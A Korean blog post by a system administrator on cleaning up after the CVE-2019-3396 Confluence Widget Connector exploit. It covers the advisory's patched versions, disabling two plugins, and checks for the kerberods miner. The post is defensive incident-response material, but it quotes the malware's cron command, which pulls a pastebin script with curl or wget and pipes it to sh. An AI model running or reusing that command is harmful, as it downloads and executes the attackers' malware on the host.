컨플루언스의 보안 취약점을 이용한 ssrf 공격때문에 짜증나서 만들어봄
전문 보기(한국어 번역)
CVE-2019-3396 위젯 커넥터 (Widget Connector) 취약점을 공격 하는 적극적인 익스플로잇 입니다 ( Confluence Security Advisory - 2019-03-20 참조 ).
또한 현재 사용하시고 있는 6.0.4버전은 End of Life로 서비스 지원이 끝난 버전입니다.
익스플로잇을 통해 배포된 malware를 제거한 후 위의 취약점이 수정된 버전을 업그레이드 하셔야 합니다.
*업그레이드가 당장 힘드신 경우 시스템 플러그인 중 하기 두개의 plugin을 비활성화 하신 후 서비스를 사용하라고 되어 있습니다.
WebDAV plugin Widget Connector
3 월 20 일에 CVE-2019-3396 위젯 커넥터 취약점을 공격하는 최근에 발표 된 악용 (트위터의 나쁜 패킷 보고서 참조)과 일치하는 동작이 Confluence 인스턴스에서 발생하고있는 것 같습니다 (Confluence Security Advisory - 2019-03-20 참조). ). • 시작 직후에 Confluence가 충돌 함 다음 단계
- 영향을 받았는지 확인하고 익스플로잇을 통해 배포 된 malware를 제거하십시오 o 우리가 발견 한 가장 보편적 인 패키지는 모든 소비자에게 해당되지는 않지만 kerberods입니다.
좋은 첫 번째 시작은 LSD Malware Clean Tool입니다. o 참조 :
- Confluence의 취약점 수정 Confluence를 영향을받지 않는 버전으로 업그레이드 § 6.6.13 § 6.12.4 § 6.13.4 § 6.14.3 § 6.15.2 o Confluence를 즉시 업그레이드 할 수없는 경우, 임시 해결 방법으로 영향을받는 시스템 플러그인을 비활성화하십시오 : 1.> 응용 프로그램 관리 (또는 추가 기능)로 이동하십시오.
- 다음 시스템 플러그인을 비활성화하십시오. WebDAV plugin
Widget Connector
Confluence가 영향을받지 않는 버전으로 업그레이드되면 이러한 플러그인을 다시 활성화하십시오.
-
cron 로그 혹은 crontab 확인:
- /tmp 폴더를 확인해보면 go.sh, go2.sh 이라는 쉘스크립트가 있을 수 있음. 해당 스크립트의 내용을 확인해보면 위의 크론로그에 기록된 스크립트가 그대로 들어있는것을 확인할 수 있음
bash (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh
-
/usr/sbin,/usr/bin에kerberods라는 실행파일이 존재하는지 확인 -
,
/etc/init.d/에netdns서비스가 존재하는 지 확인 -
CPU를 엄청 잡아먹어대는 프로세스가 있는지 확인
clean_malware.sh스크립트 실행
$ chmod +x clean_malware.sh
$ ./clean_malware.sh- 아래 소스에서 약간 다른 케이스를 추가해 수정함.
- https://git.laucyun.com/security/lsd_malware_clean_tool